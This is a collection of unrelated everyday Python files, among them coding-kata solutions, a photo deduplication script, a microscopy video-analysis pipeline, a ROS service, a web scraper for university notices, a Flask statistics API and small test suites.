def isAnagram(test, original):
""" is_anagram == PEP8 (forced mixedCase by CodeWars) """
return sorted(a for a in test.lower() if a.isalnum()) \
== sorted(b for b in original.lower() if b.isalnum())
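# Illustrative check (not part of the original kata solution): punctuation and
# letter case are ignored, so these two strings count as anagrams.
print(isAnagram("Dormitory", "Dirty room!"))  # expected: True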
|
import hashlib
import os
import requests
import exifread
from pathlib import PurePath
from datetime import datetime
url = 'http://192.168.0.114:8880/photos/'
sourceDir = 'BookLive/Public/Shared Pictures/Scan'
destDir = '/volume1/photo'
def hash_file(filename):
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
# open file for reading in binary mode
with open(filename,'rb') as file:
# loop till the end of the file
chunk = 0
while chunk != b'':
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
def getDir(filename, dateTaken):
"""This function takes the filename and date taken
create a dir name dest folder will be YYYY/MM/DD/filename
If EXIF is unavailable, then the folder should be
destFolder/filename"""
    if dateTaken is None:
return PurePath(destDir, PurePath(filename).parent.name, PurePath(filename).name)
return PurePath(destDir, dateTaken[:4], dateTaken[5:7], dateTaken[8:10], PurePath(filename).name)
print(sourceDir)
for root, dirs, files in os.walk(sourceDir, topdown=False):
print(root)
if "@eaDir" in root:
continue
print(root)
hashes = {}
for name in files:
        # Iterate through all the files and calculate the SHA-1 hash of each one.
        # Check the hash against the DB: if the hash is already there, the file is a duplicate.
        # If not, create a new record and copy the file.
        # The destination dir is determined from EXIF: if EXIF data exists,
        # the destination directory will be YYYY/MM/DD.
        # If there is no EXIF data, the destination directory will
        # be the same as the source dir.
hashcode = hash_file(os.path.join(root, name))
result = requests.get(url + hashcode)
if result.status_code == 200:
print(os.path.join(root, name) + ' already present')
continue
        # So the hash is unique; let's figure out the destination dir
with open(os.path.join(root, name), 'rb') as f:
tags = exifread.process_file(f, details=False)
dateTaken = None
if tags and 'EXIF DateTimeOriginal' in tags:
dateTaken = str(tags['EXIF DateTimeOriginal'])[:10].replace(":", "-") + 'T' + str(tags['EXIF DateTimeOriginal'])[11:]
        destFileName = getDir(os.path.join(root, name), dateTaken)
if dateTaken is None:
dateTaken = datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
print(destFileName)
#result = requests.post(url, json = {"name": name, "path": root, "hash": hashcode, "dateTaken": dateTaken})
#shutil.move(root / name, destFileName)
|
from skimage import io
from skimage.transform import downscale_local_mean
from skimage.filters import threshold_sauvola as threshold
from skimage.segmentation import clear_border, random_walker
from skimage.measure import label, regionprops
from skimage.morphology import binary_opening, square, remove_small_objects
from skimage.color import gray2rgb
from skimage.draw import circle
import config
from mpyx.F import EZ, As, By, F, Datagram
# from mpyx.F import Serial, Parallel, Broadcast, S, P, B
# from mpyx.F import Iter, Const, Print, Stamp, Map, Filter, Batch, Seq, Zip, Read, Write
# from mpyx.Vid import BG
from mpyx.Vid import FFmpeg
# from mpyx.Compress import VideoFile, VideoStream
from lib.Database import Database, DBWriter
from lib.Crop import Crop
from dateutil.parser import parse as dateparse
from base64 import b64encode
from itertools import repeat
from PIL import Image
from io import BytesIO
from uuid import uuid4
# import matplotlib.pyplot as plt
import numpy as np
import traceback
import multiprocessing
import subprocess
import threading
import concurrent.futures
import shutil
import shlex
import pexpect
import queue
import asyncio
import fcntl
import tempfile
import time
import os
import sys
import cv2
# import matplotlib.pyplot as plt
async def main(args):
if len(args) < 2:
print("""path/to/video/file.avi 2017-10-31 Name-of_video "Notes. Notes." """)
else:
print(await detect_video(*args))
async def detect_video(video_file, date, name="Today", notes=""):
cpus = multiprocessing.cpu_count()
experiment_uuid = uuid4()
experiment_day = dateparse(date)
experiment_dir = os.path.join(config.experiment_dir, str(experiment_uuid))
experiment = (experiment_uuid, experiment_day, name, "detection", notes)
try:
print("Creating data directory", experiment_dir)
os.mkdir(experiment_dir)
scaleby = 1
w, h = int(2336 / scaleby), int(1729 / scaleby)
# Reads the source video, outputs frames
print("Launching Video Reader")
video_reader = FFmpeg(
video_file,
"",
(h, w, 1),
"-ss 00:00:02.00 -t 00:00:00.50 -vf scale={}:{}".format(w, h),
[],
False,
FrameData,
)
print("Launching Database processor")
db_proc = DB_Processor(experiment_uuid, experiment_day, name, notes)
print("Launching Entry processor")
entry_proc = Entry(experiment_uuid)
print("Launching Magic pixel processor")
magic_proc = MagicPixel()
print("Launching Rescale processor")
rescale_proc = Rescaler()
# Computes a background for a frame, outputs {"frame": frame, "bg": bg}
print("Launching Background Modeler")
bg_proc = BG(model="simpleMax", window_size=50, img_shape=(h, w, 1))
# Takes a background and a frame, enhances frame to model foreground
print("Launching Foreground Modeler")
fg_proc = FG()
# Takes a foreground frame, binarizes it
print("Launching Binary Mask Processor")
mask_proc = Binary("legacyLabeled")
print("Launching Properties Processor")
prop_proc = Properties()
print("Launching Crop Processor")
crop_proc = Crop_Processor()
# A utility to view video pipeline output
raw_player = RawPlayer()
bg_player = BGPlayer()
fg_player = FGPlayer()
mask_player = MaskPlayer()
crop_player = CropPlayer()
meta_player = MetaPlayer()
# A utility to clean up datagram resources
cleaner = Cleaner()
# Todo
# print("Launching Crop Writer")
# print("Launching Detection Video Writer")
# print("Launching Particle Commmitter")
# /todo
EZ(
video_reader,
entry_proc,
magic_proc,
meta_player,
rescale_proc,
raw_player,
bg_proc,
fg_proc,
mask_proc,
cleaner,
).start().join()
except Exception as e:
print("Uh oh. Something went wrong")
traceback.print_exc()
# wq.push(None)
if os.path.exists(experiment_dir):
print("Removing files from", experiment_dir)
shutil.rmtree(experiment_dir)
else:
pass
# dbwriter.commit()
# wq.push(None)
finally:
print("Fin.")
return experiment_uuid
class Cleaner(F):
def do(self, frame):
frame.clean()
class RawPlayer(F):
def do(self, frame):
cv2.imshow("Raw Display", frame.raw)
self.put(frame)
cv2.waitKey(1000 // 24)
class FGPlayer(F):
def do(self, frame):
cv2.imshow("FG Display", frame.fg)
self.put(frame)
cv2.waitKey(1000 // 24)
class MaskPlayer(F):
def do(self, frame):
cv2.imshow("Mask Display", 1.0 * frame.mask)
self.put(frame)
cv2.waitKey(1000 // 24)
class BGPlayer(F):
def do(self, frame):
cv2.imshow("BG Display", frame.bg)
self.put(frame)
cv2.waitKey(1000 // 24)
class CropPlayer(F):
def do(self, frame):
crops = frame.crops
crop_h = crops.shape[1]
crop_w = crops.shape[2]
crops_n = crops.shape[0]
disp_w_n = 30
disp_h_n = int(np.ceil(crops_n / disp_w_n))
disp_w = int(disp_w_n * crop_w)
disp_h = int(disp_h_n * crop_h)
disp = np.zeros((disp_h, disp_w))
# print("------------------")
# print("crops:", crops.shape)
# print("crop_h", crop_h)
# print("crop_w", crop_w)
# print("crops_n", crops_n)
# print("disp_w", disp_w)
# print("disp_h", disp_h)
for i in range(disp_h_n):
for j in range(disp_w_n):
                n = i * disp_w_n + j
                if n >= crops_n:
                    break
disp[
i * crop_h : i * crop_h + crop_h, j * crop_w : j * crop_w + crop_w
] = crops[n].squeeze()
cv2.imshow("Crop Display", disp)
self.put(frame)
cv2.waitKey(1000 // 24)
class MetaPlayer(F):
def do(self, frame):
print(
"Experiment:",
frame.experiment_uuid,
", Segment:",
frame.segment_uuid,
" Number:",
frame.number,
" Segment Number:",
frame.segment_number,
)
self.put(frame)
class Entry(F):
def initialize(self, experiment_uuid):
self.experiment_uuid = experiment_uuid
self.count = 0
def do(self, frame):
frame.experiment_uuid = self.experiment_uuid
frame.number = self.count
frame.uuid = uuid4()
        self.count += 1
frame.raw = frame.raw / 255
self.put(frame)
class MagicPixel(F):
# Not sure this works currently...
def do(self, frame):
magic_pixel = 255
magic_pixel_delta = 0.1
segment_number = -1
raw = frame.raw
if config.use_magic_pixel_segmentation:
this_frame_magic_pixel = raw[0, 4, 0]
if abs(this_frame_magic_pixel - magic_pixel) > magic_pixel_delta:
print("Segment Boundry Detected")
segment_number += 1
segment = (uuid4(), frame.experiment_uuid, segment_number)
magic_pixel = this_frame_magic_pixel
frame.segment_uuid = segment[0]
frame.segment_number = segment[2]
self.put(frame)
from skimage.transform import rescale
class Rescaler(F):
def do(self, frame):
frame.raw = rescale(frame.raw, 0.5)
self.put(frame)
import math
from collections import deque
class BG(F):
def setup(self, model="median", window_size=20, *args, env=None, **kwArgs):
        self.frame_que = deque(maxlen=window_size + 1)  # +1 so the "> window_size" flush in do() can actually trigger
self.window_size = window_size
# self.q_len = math.ceil(window_size / 2)
# self.q_count = 0
self.model = getattr(self, model)(window_size=window_size, *args, **kwArgs)
def do(self, frame):
# import cv2
# from uuid import uuid4
self.frame_que.append(frame)
# self.q_count += 1
self.bg = self.model.process(frame.raw)
# cv2.imwrite('/home/mot/tmp/bg_'+str(uuid4())+'.png', self.bg)
if len(self.frame_que) > self.window_size:
# bg = self.que.popleft()
frame = self.frame_que.popleft()
frame.bg = self.bg
self.put(frame)
def teardown(self):
while len(self.frame_que) > 0:
# self.q_count -= 1
frame = self.frame_que.popleft()
frame.bg = self.bg
self.put(frame)
class simpleMax:
def __init__(self, window_size=20, img_shape=None):
# print("simpleMax maxlen: "+str(math.ceil(window_size / 2)-5))
self.window_size = window_size
self.que = deque(maxlen=window_size)
self.bg = None
def process(self, frame):
# like erosion, but faster
from skimage.filters.rank import minimum
# parameter: minimum lighting (dynamic range), threshold below
min_range = 20
if len(self.que) < self.window_size:
self.que.append(frame)
elif len(self.que) == self.window_size:
# print("computing bg...")
if self.bg is None:
bg = np.max(self.que, axis=0)
bg[bg < min_range] = 0
bg = minimum(bg.squeeze(), square(8))
bg = np.expand_dims(bg, axis=-1)
self.bg = bg
return self.bg
class FG(F):
def setup(self, model="division", *args, **kwargs):
# If your process needs to do any kind of setup once it has been forked,
        # or if it is the first process in a workflow and is expected to generate
# values for the rest of the pipeline, that code should go here.
self.model = getattr(self, model)()
def do(self, frame):
# The main workhorse of a process. Items will flow in here, potentially
# be modified, mapped, reduced, or otherwise morgified, and output can
# be then pushed downstream using the self.put() method.
# Here, for example, any items are simply passed along.
frame.fg = self.model.process(frame)
self.put(frame)
class division:
def __init__(self):
pass
def process(self, frame):
"""
Expects a dict with bg, frame
"""
eps = 0.0001
div = frame.raw / (frame.bg + eps)
# div[np.isnan(div)] = 1.0 # get rid of nan's from 0/0
return np.clip(div, 0, 1)
from skimage.filters import threshold_sauvola
from skimage.morphology import binary_opening, remove_small_objects, square, erosion
from skimage.segmentation import clear_border
class Binary(F):
def setup(self, model="simple", *args, **kwargs):
# If your process needs to do any kind of setup once it has been forked,
        # or if it is the first process in a workflow and is expected to generate
# values for the rest of the pipeline, that code should go here.
self.model = getattr(self, model)(*args, **kwargs)
def do(self, frame):
# The main workhorse of a process. Items will flow in here, potentially
# be modified, mapped, reduced, or otherwise morgified, and output can
# be then pushed downstream using the self.put() method.
# Here, for example, any items are simply passed along.
frame.mask = self.model.process(frame)
self.put(frame)
class legacyLabeled:
def __init__(self, threshold=0.5):
self.threshold = threshold
def process(self, frame):
# Take the center, removing edge artifacts
# frame = frame[200:-200, 200:-200]
sframe = frame.fg.squeeze()
binary = sframe < self.threshold
binary = binary_opening(binary, square(3))
binary = clear_border(binary)
# opened = binary_opening(binary, square(3))
# cleared = clear_border(opened)
return binary
from skimage.measure import label, regionprops
class Properties(F):
def do(self, frame):
labelled = label(frame.mask)
frame.regionprops = regionprops(labelled, frame.fg.squeeze())
        frame.track_uuids = [uuid4() for _ in range(len(frame.regionprops))]
self.put(frame)
from lib.Crop import Crop
class Crop_Processor(F):
def do(self, frame):
regionprops = frame.regionprops
cropper = Crop(frame.fg)
coords = [(p.centroid[1], p.centroid[0]) for p in regionprops]
bboxes = [((p.bbox[1], p.bbox[0]), (p.bbox[3], p.bbox[2])) for p in regionprops]
crops = np.array(
[cropper.crop(int(round(c[0])), int(round(c[1]))) for c in coords]
)
frame.crops = crops
self.put(frame)
class Crop_writer(F):
def do(self, frame):
crops = frame.crops
class FrameData(Datagram):
def initialize(self):
self.experiment_uuid = None
self.segment_uuid = None
self.segment_number = None
self.uuid = None
self.number = None
class DB_Processor(F):
async def initialize(
self, experiment_uuid, experiment_day, name, notes, verbose=False
):
self.verbose = verbose
self.experiment_uuid = experiment_uuid
self.experiment_day = experiment_day
self.name = name
self.notes = notes
self.tx, self.transaction = await Database().transaction()
self.csv_files = [
"/tmp/{}_segment.csv",
"/tmp/{}_frame.csv",
"/tmp/{}_track.csv",
"/tmp/{}_particle.csv",
]
def add_segment(self, frame):
data = (frame.segment_uuid, frame.experiment_uuid, frame.segment_number)
s = "{}\t{}\t{}\n"
with open("/tmp/{}_segment.csv".format(self.experiment_uuid), "a") as f:
for g in [data]:
                f.write(s.format(g[0], g[1], g[2]))
def add_frame(self, frame):
data = (frame.uuid, frame.experiment_uuid, frame.segment_uuid, frame.number)
s = "{}\t{}\t{}\t{}\n"
with open("/tmp/{}_frame.csv".format(self.experiment_uuid), "a") as f:
for g in [data]:
f.write(s.format(g[0], g[1], g[2], g[3]))
def add_detections(self, frame):
regionprops = frame.regionprops
DEFAULT_CATEGORY = 1 # set to unknown for now
particles = [
(
uuid4(),
self.experiment_uuid,
p.area,
p.mean_intensity,
p.perimeter,
p.major_axis_length,
p.minor_axis_length,
p.orientation,
p.solidity,
p.eccentricity,
DEFAULT_CATEGORY,
)
for i, p in enumerate(regionprops)
]
coords = [(p.centroid[1], p.centroid[0]) for p in regionprops]
bboxes = [((p.bbox[1], p.bbox[0]), (p.bbox[3], p.bbox[2])) for p in regionprops]
track_uuids = frame.track_uuids
tracks = [
            (track_uuids[i], frame.uuid, particles[i][0], coords[i], bboxes[i])
for i, p in enumerate(regionprops)
]
s = "{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\n"
with open("/tmp/{}_particle.csv".format(self.experiment_uuid), "a") as f:
for p in particles:
f.write(
s.format(
p[0],
p[1],
p[2],
p[3],
p[4],
p[5],
p[6],
p[7],
p[8],
p[9],
p[10],
)
)
s = "{}\t{}\t{}\t{}\t{}\n"
with open("/tmp/{}_track.csv".format(self.experiment_uuid), "a") as f:
for t in tracks:
f.write(s.format(t[0], t[1], t[2], t[3], t[4]))
def do(self, sql_drop):
method, query, args = sql_drop
if self.verbose:
print("DBWriter Exiting")
async def teardown(self):
if self.verbose:
print("Inserting experiment into database.")
        await self.tx.execute(
"""
INSERT INTO Experiment (experiment, day, name, method, notes)
VALUES ($1, $2, $3, $4, $5)
""",
self.experiment_uuid,
self.experiment_day,
self.name,
"DetectionMpyxDatagram",
self.notes,
)
if self.verbose:
print("Inserting segments into database.")
await self.tx.execute(
"""
COPY segment FROM '/tmp/{}_segment.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting frames into database.")
await self.tx.execute(
"""
COPY frame FROM '/tmp/{}_frame.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting particles into database.")
await self.tx.execute(
"""
COPY particle (particle, experiment, area, intensity, perimeter, major, minor, orientation, solidity, eccentricity, category\n)FROM '/tmp/{}_particle.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting tracks into database.")
        await self.tx.execute(
"""
COPY track (track, frame, particle, location, bbox\n) FROM '/tmp/{}_track.csv' DELIMITER '\t' CSV;
""".format(
                self.experiment_uuid
)
)
await self.transaction.commit()
        for f in self.csv_files:
if os.path.isfile(f.format(self.experiment_uuid)):
os.remove(f.format(self.experiment_uuid))
|
#!/usr/bin/env python
import math
import rospy
from myturtle.srv import *
from nav_msgs.msg import Odometry
class LandmarkMonitor(object):
def __init__(self):
self._benda = {
"Cube":(0.31,-0.99),
"Dumpster":(0.11,-2.42),
"Cylinder":(-1.14,-2.88),
"Barrier":(-2.59,-0.83),
"Bookshelf":(-0.09,0.53)
}
self._x = 0
self._y = 0
def get_closest(self, req):
rospy.loginfo('GetClosest called')
        best_landmark = ''
        best_distance = -1
for name, (x, y) in self._benda.items():
dx = x - self._x
dy = y - self._y
sq_dist = dx*dx + dy*dy
if best_distance == -1 or sq_dist < best_distance:
best_distance = sq_dist
best_landmark = name
response = GetClosestResponse()
response.name = best_landmark
return response
def get_distance(self, req):
rospy.loginfo('GetDistance called with {}'.format(req.name))
if req.name not in self._benda:
rospy.logerr('Tidak dikenali "{}"'.format(req.name))
return None
x, y = self._benda[req.name]
dx = x - self._x
dy = y - self._y
response = GetDistanceResponse()
response.distance = math.sqrt(abs(dx*dx+dy*dy))
return response
def odom_callback(self, msg):
self._x = msg.pose.pose.position.x
self._y = msg.pose.pose.position.y
def main():
rospy.init_node('landmark_server')
monitor = LandmarkMonitor()
get_closest = rospy.Service('get_closest', GetClosest, monitor.get_closest)
get_distance = rospy.Service('get_distance', GetDistance, monitor.get_distance)
sub = rospy.Subscriber('/odom', Odometry, monitor.odom_callback)
rospy.spin()
if __name__=='__main__':
main()
|
# https://github.com/hflabs/dadata-py
from dadata import Dadata
token = "" # Токен с сервиса DaData
secret = "" # Секретный ключ с сервиса DaData
def check(name,query):
dadata = Dadata(token, secret) # Данные для авторизации в сервисе DaData
infoCompany = dadata.find_by_id(name, query) # Поиск информации о компании
if infoCompany[0]['data']['type'] == 'LEGAL':
print(infoCompany[0]['data']['name']['full']) # Названия компании
print(infoCompany[0]['data']['type']) # Тип компании
print(infoCompany[0]['data']['opf']['full']) # Полный префикс компании
print(infoCompany[0]['data']['opf']['short']) # Короткий префикс компании
print(infoCompany[0]['data']['address']['data']['region_type_full']) # Тип региона
print(infoCompany[0]['data']['address']['data']['region']) # Название региона
print(infoCompany[0]['data']['address']['data']['city_type']) # Название города
print(infoCompany[0]['data']['address']['data']['city']) # Название города
print(infoCompany[0]['data']['address']['data']['street_type_full']) # Тип улица/проспект
print(infoCompany[0]['data']['address']['data']['street']) # Название улицы
print(infoCompany[0]['data']['address']['data']['house_type_full']) # Тип улица/проспект
print(infoCompany[0]['data']['address']['data']['house']) # Название улицы
else:
print(infoCompany[0]['data']['name']['full']) # Названия компании
print(infoCompany[0]['data']['type']) # Тип компании
print(infoCompany[0]['data']['opf']['full']) # Полный префикс компании
print(infoCompany[0]['data']['opf']['short']) # Короткий префикс компании
print(infoCompany[0]['data']['address']['data']['region_type_full']) # Тип региона
print(infoCompany[0]['data']['address']['data']['region']) # Название региона
check(name='party', query='0274940895') # Проверка компании по ИНН 0274940895
|
s = 0
v = 0
for c in range(1, 7, 1):
n = int(input(f'Digite o {c}° valor: '))
if n % 2 == 0:
s += n
v += 1
print(f'A soma de todos os {v} valores vale {s}')
|
import urllib.request  # module for fetching HTML documents from the web
from bs4 import BeautifulSoup  # module for parsing and searching HTML documents
import os
from selenium import webdriver  # framework for automating web-browser interaction
from selenium.webdriver.common.keys import Keys
import time
filename = '학사공지'
chrome = 'c:\\data\\chromedriver.exe'
browser = webdriver.Chrome(chrome)  # instantiate the web browser
browser.get('https://www.duksung.ac.kr/bbs/board.do?bsIdx=35&menuId=1058')
time.sleep(1)
def get_save_path():
    save_path = 'C:\\data\\덕성여대공지사항\\{}.txt'.format(filename)
    if not os.path.isdir(os.path.split(save_path)[0]):
        os.mkdir(os.path.split(save_path)[0])  # create the directory if it does not already exist
    return save_path
def fetch_list_url():
    params = []
    # for cnt in range(1, 5):
    browser.find_element_by_xpath("//body")  # make sure the page is active
    html = browser.page_source  # grab the current page source (page 1)
    soup = BeautifulSoup(html, "lxml")
    for i in soup.find_all('div', class_='table-responsive'):
        params.append('http://www.duksung.ac.kr' + i('a')[0]['href'])  # find_all returns a list, so [0] is needed
    list_url = 'http://www.duksung.ac.kr' + soup.find_all('div', class_='table-responsive')[0]('a')[0]['href']
    #print('\n', list_url)
    for i in range(9):
        list_url = 'http://www.duksung.ac.kr' + soup.find_all('div', class_='table-responsive')[0]('a')[i]['href']
        print('\n', list_url)
        url = urllib.request.Request(list_url)
        res = urllib.request.urlopen(url).read().decode('utf-8')
        soup2 = BeautifulSoup(res, 'html.parser')  # parse the response HTML with BeautifulSoup
        for i in soup2.find_all('td', class_='text-left'):
            params.append('http://www.duksung.ac.kr' + i('a')[0]['href'])
    print(params)  # all notice URLs on the page have been collected
    browser.quit()
    return params
def fetch_list_url2():
    params2 = fetch_list_url()
    f = open(get_save_path(), 'w', encoding='utf-8')  # open the output file returned by get_save_path()
    for i in params2:
        list_url = "{}".format(i)
        url = urllib.request.Request(list_url)
        res = urllib.request.urlopen(url).read().decode('utf-8')
        soup = BeautifulSoup(res, "html.parser")  # parse the response HTML with BeautifulSoup
        article1 = soup('div', class_='panel-title view-title h5')[0].get_text(strip=True, separator='\n')
        article2 = soup('div', class_='bbs_memo')[0].get_text(strip=True, separator='\n')
        # the article content changes on every loop iteration
        f.write(article1 + article2 + '\n'*2 + '='.ljust(50, '=') + '\n')  # append each article to the file
    f.close()
fetch_list_url2()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-07-09 22:37:34
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import os
class Solution:
def intersection(nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
set1 = set(nums1)
resultSet = set([])
for i in nums2:
if i in set1:
resultSet.add(i)
return list(resultSet)
if __name__=='__main__':
print(Solution.intersection([],[]))
|
#!/usr/bin/env python
"""Test suite for the ``accuracy`` module"""
import numpy as np
from pytest import raises
from accuracy import accuracy
def test_error_length():
y_pred = np.array([False, True, True])
y_true = np.array([True, False])
raises(AssertionError, accuracy, y_pred, y_true)
def test_basic():
y_true = np.array([True, False, True, True, False])
y_pred = np.array([True, True, False, True, False])
acc = accuracy(y_true, y_pred)
reference = 3. / 5.
assert acc == reference
def test_basic_balanced():
y_true = np.array([True, True, True, False, False])
y_pred = np.array([True, True, False, True, False])
acc = accuracy(y_true, y_pred, balanced=True)
reference = ((2. / 3.) + (1. / 2.)) / 2.
assert acc == reference
def test_all_positives():
y_true = np.ones((5), dtype=bool)
y_pred = np.random.randn(y_true.size)
y_pred -= y_pred.min()
y_pred += 1.
acc = accuracy(y_true, y_pred)
assert acc == 1.0
acc = accuracy(y_pred, y_true)
assert acc == 1.0
def test_all_negatives():
y_true = np.zeros((5), dtype=bool)
y_pred = ~y_true
acc = accuracy(y_pred, y_true)
assert acc == 0.0
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
from flask import Flask, jsonify
from flask import request
from scipy.stats import ttest_ind
app = Flask(__name__)
# API route
@app.route('/sklearn', methods=['POST'])
def index():
import numpy as np
data = request.json
data = data["data"]
print(data)
print(data[0])
print(data[1])
for key1, value in data[0].items():
# list1.append(key)
global X
X = value
global name1
name1 = key1
for key2, value2 in data[1].items():
# list1.append(key)
global Y
Y = value2
global name2
name2 = key2
    try:
        # means
        xx = np.mean(X)
        yy = np.mean(Y)
        # absolute difference of the means
        if xx > yy:
            jzc = xx - yy
        else:
            jzc = yy - xx
        # standard deviations
        bzc = np.std(X, ddof=1)
        bzc = round(bzc, 2)
        bzc2 = np.std(Y, ddof=1)
        bzc2 = round(bzc2, 2)
        # minimums
        zxz = min(X)
        zxz2 = min(Y)
        # maximums
        zdz = max(X)
        zdz2 = max(Y)
        # percentiles (the code below computes the 75th percentile)
        """
        Step 1: sort the data.
        Step 2: compute the lower and upper indices that bracket the percentile
                (array indices start at 0); if the lower index lands exactly on the
                target position, subtract 1.
        Step 3: the two indices delimit an interval; linearly interpolate within it,
                starting from the lower value, to obtain the percentile.
        """
X = sorted(X)
num = len(X)
N = num - 1
print(N)
        # compute the percentile
        P = 75  # percentile rank
floor1 = int(np.floor(N / 100 * P))
ceil1 = int(np.ceil(N / 100 * P))
if floor1 == ceil1:
floor1 -= 1
        bfw = X[floor1] + (X[ceil1] - X[floor1]) * (N / 100 * P - floor1)  # cf. np.percentile(X, 75)
Y = sorted(Y)
num2 = len(Y)
N2 = num2 - 1
print(N2)
        # compute the percentile
        P2 = 75  # percentile rank
floor12 = int(np.floor(N2 / 100 * P2))
ceil12 = int(np.ceil(N2 / 100 * P2))
if floor12 == ceil12:
floor12 -= 1
        bfw2 = Y[floor12] + (Y[ceil12] - Y[floor12]) * (N2 / 100 * P2 - floor12)  # cf. np.percentile(Y, 75)
        # ttest_ind assumes equal variances by default; equal_var=False switches to Welch's t-test for unequal variances.
t, p = ttest_ind(X, Y, equal_var=False)
print(ttest_ind(X, Y, equal_var=False))
except Exception as e:
e = str(e)
return jsonify(erro=e)
# return jsonify(yy={name1: {'N值': 12, '均值': xx, '标准差': bzc, '最小值': zxz, '75%位数': bfw, '最大值': zdz},
# name2: {'N值': 13, '均值': yy, '标准差': bzc2, '最小值': zxz2, '75%位数': bfw2, '最大值': zdz2},
# '配对t检验': {'均值差': jzc, 't值': round(t,2), 'p值': round(p, 8), '样本1均值': xx, '样本2均值': yy}
# })
return jsonify(yy={"data": [
{
"code": 0,
"message": None,
"varInfos": None,
"mData": None,
"fields": [],
"rFiles": [],
"tables": [{"parentTitle": "",
"parentContent": [],
"title": name1+"正态性检验",
"content": [],
"rowTop": "",
"colTop": "",
"rowNames": [1, 2],
"combination": False,
"colNames": ['N值', '均值', '标准差', '最小值', '75%位数', '最大值'],
"values": [[12, xx, bzc, zxz, bfw, zdz], [13, yy, bzc2, zxz2, bfw2, zdz2]]
},
{"parentTitle": "",
"parentContent": [],
"title": name1+"t检验",
"content": [],
"rowTop": "",
"colTop": "",
"rowNames": [1, 2],
"combination": False,
"colNames": ['均值差', 't值', 'p值', '样本1均值', '样本2均值'],
'values': [jzc, round(t, 2), round(p, 8), xx, yy]}
]
}]
})
if __name__ == '__main__':
app.run(debug=True)
# app.run(debug=True,host="192.168.11.220",port=5000)
|
#!/usr/bin/python
import time
import numpy as np
import sys
#tos stuff
from DecodedMsg import *
from tinyos.message import MoteIF
class MyClass:
def __init__(self,N):
self.prevtime = time.time()
self.N = N
self.A = make_A_matrix(self.N)
self.counter = 0;
self.perform_svd = 0;
# Create a MoteIF
self.mif = MoteIF.MoteIF()
# Attach a source to it
self.source = self.mif.addSource("sf@localhost:9002")
# SomeMessageClass.py would be generated by MIG
self.mif.addListener(self, DecodedMsg)
# Called by the MoteIF's receive thread when a new message
# is received
def receive(self, src, msg):
m = DecodedMsg(msg.dataGet())
self.counter = m.get_counter()
timeformat = '%Y/%d/%m %H:%M:%S'
print 'Received message %s: counter: %d' % (time.strftime(timeformat), self.counter)
if m.get_perform_svd() == self.N:
#print ' svd received:'
Svals = m.get_A()
print 'Rx svd: ', Svals
U,S,V = np.linalg.svd(self.A)
#S = [s**2 for s in S]
#print ' svd check:'
print 'PC svd: ', S
self.perform_svd = 0
self.A = make_A_matrix(self.N)
print 'MSE: ', np.linalg.norm(np.array(S)-np.array(Svals),2)
proctime = time.time() - self.prevtime
print 'Elapsed time: %f seconds' % proctime
else:
self.prevtime = time.time()
self.perform_svd += 1
self.counter += 1
self.send()
def send(self):
smsg = DecodedMsg()
smsg.set_counter(self.counter)
smsg.set_perform_svd(self.perform_svd)
if self.perform_svd:
smsg.set_A(self.A[self.perform_svd-1])
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
def make_A_matrix(N):
A = np.random.randn(N,N)
return A
if __name__ == "__main__":
print "Running"
if len(sys.argv) > 1:
N = int(sys.argv[1])
else:
N = 6
m = MyClass(N)
|
"""
Description: Given a string containing just the characters '(', ')', '{', '}',
'[' and ']', determine if the input string is valid.
An input string is valid if:
Open brackets must be closed by the same type of brackets.
Open brackets must be closed in the correct order.
NOTE: An empty string is also considered valid.
"""
class Solution(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
if len(s) % 2 != 0:
return False
dict_paren = {'(': ')', '{': '}', '[': ']'}
stack = []
for char in s:
# check if the char is opening parentheses
if char in dict_paren:
# add the closing pair
val = dict_paren[char]
stack.append(val)
            else:
                # a closing bracket must match the most recent opener
                if not stack or char != stack.pop():
                    return False
return len(stack) == 0
s = ''
obj = Solution()
result = obj.isValid(s)
print(result)
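# A few extra illustrative checks (not in the original snippet), including a
# string that starts with a closing bracket (the empty-stack case):
print(obj.isValid('()[]{}'))  # expected: True
print(obj.isValid('(]'))      # expected: False
print(obj.isValid(']'))       # expected: False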
|
# specifically handles lowercase letters
import pandas as pd
from Bio import SeqIO
df=pd.read_excel('ldes/sample4.xlsx')
stseq=[]
site=[]
nn = 0
for row in df.itertuples():
aimid = row[1]
aimseq = row[3]
if (aimseq.find('c')>-1) and (aimseq.find('h')==-1):
a=aimseq.find('c')
b=len(aimseq)-a
c=aimseq.upper()
        try:
            # dictseq: mapping from protein ID to full sequence; it is assumed to be
            # defined elsewhere (e.g. built from a FASTA file with SeqIO); otherwise
            # the lookup raises and falls through to the except branch below
            sseq = dictseq[aimid]
n=0
for n,AA in enumerate(sseq):
if ((AA=='C') and (c==sseq[n-a:n+b])):
aimsite=n+1
if aimsite < 26:
seq51 = (26-aimsite)*'*' + sseq[0:aimsite+25]
elif (aimsite+24) > len(sseq):
seq51 = sseq[aimsite-26:] + (25-(len(sseq)-aimsite))*'*'
else:
seq51 = sseq[aimsite-26:aimsite+25]
except:
seq51="error"
aimsite="error"
else:
seq51='error'
aimsite='error'
site.append(aimsite)
stseq.append(seq51)
nn=nn+1
print('蛋白质序列匹配中,目前已经运行至第',nn,'个',aimid,'数字为',len(site),len(stseq),seq51)
#while stseq.count('')>0:
#stseq.remove('')
df['site']=site
df['standard_sequence']=stseq
df.to_csv('ldes/rs4.csv')
print("运行完毕!")
|
# -*- coding: utf-8 -*-
"""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void add3d_local(float *a_local, float *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
"""
import numpy as np
import pycuda.driver as drv
